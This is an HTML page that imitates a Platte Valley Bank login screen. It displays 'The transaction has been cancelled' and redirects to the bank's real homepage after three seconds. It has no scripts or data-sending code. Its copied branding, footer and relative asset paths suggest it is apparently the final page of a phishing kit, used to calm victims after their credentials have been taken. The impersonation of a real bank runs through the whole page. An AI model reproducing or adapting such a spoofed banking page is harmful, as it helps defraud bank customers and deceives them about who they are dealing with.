<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="refresh" content="3; url=https://pvbank.com/">
    <title>Login · Platte Valley Bank</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
    <link rel="manifest" href="/app-manifest">
    <meta name="theme-color" content="#272d40">
    <link href="css/vthreeallFullCss.css" rel="stylesheet">
    <link href="css/224.css" rel="stylesheet">
    <link rel="icon" type="image/x-icon" href="favicon.ico">
    <link rel="icon" sizes="192x192" href="favicon.ico">
    <link rel="apple-touch-icon" href="favicon.ico">
    <style>
        .sec{
            display: block;
            font-family: roboto;
            font-weight: 400;
            line-height: 18px;
            font-size: 13px;
            padding: 17px 20px 17px 20px;
            width: 100%; 
            background-color: white;
            position: relative;
            bottom: 0;
            text-align: center;
            text-size-adjust: 100%;
            color: rgb(112, 112, 112);
            box-shadow: rgba(0,0,0,0.1)0px -1px 0px 0px;
            z-index: 1;
            }
            @media (max-width: 600px){
            .sec{
                padding-left: 80px;
                padding-right: 80px;
            }
        }
    </style>
</head>
<body>
    <banno-web>
        <div class="placeholder-login">
            <div class="placeholder-login-wrapper">
                <div class="placeholder-card" style="background-color: white">
                    <div class="placeholder-progress-container">
                        <div class="login-wrapper"> 
                            <jha-card has-data="">  <br>
                                <jha-card-header slot="header" class="">
                                    <div><img height="80" style="margin-top: -50px;" alt="Logo" src="images/Logo.png"></div>
                                </jha-card-header>
                            </jha-card> 
                        </div><br><br>
                        <?xml version="1.0" encoding="utf-8"?>
                        <svg version="1.1" width="70" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve"><style type="text/css"><![CDATA[
                            .st0{fill:rgb(3, 39, 95);}
                        ]]></style><g><path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"/></g></svg><p></p>
                        <h1 style="color:rgb(3, 39, 95)">The transaction has been cancelled</h1><p>You're being redirected to Homepage.........</p>
                    </div>
                </div>
            </div>
            
        </div>
    </banno-web> 
    <bannoweb-footer class="sec" style="margin-top: -52px;">©2024 Platte Valley Bank<span>&nbsp;</span> <span>•</span> <span>&nbsp;</span> <a href="#" style="color: rgb(3, 39, 95); text-decoration: none;"> Privacy policy</a> <span>&nbsp;</span> <span class="end-of-line">•</span> <span>&nbsp;</span> Member FDIC <span>&nbsp;</span> <span class="end-of-line">•</span> <span>&nbsp;</span><svg width="16" height="11" viewBox="0 0 10 7" class="ehl-icon" aria-hidden="true"> <path d="M4.96.222L.337 2.588v.962l.511.007v3.448h8.186L9.03 3.55h.55v-.962L4.959.222zm3.163 5.872H1.76V3.028l3.2-1.65 3.163 1.65v3.066zm-4.677-2.26h2.999v-.828H3.446v.828zm0 1.489h2.985v-.828H3.446v.828z"></path></svg> Equal Housing Lender </bannoweb-footer>
</body>  
</html>
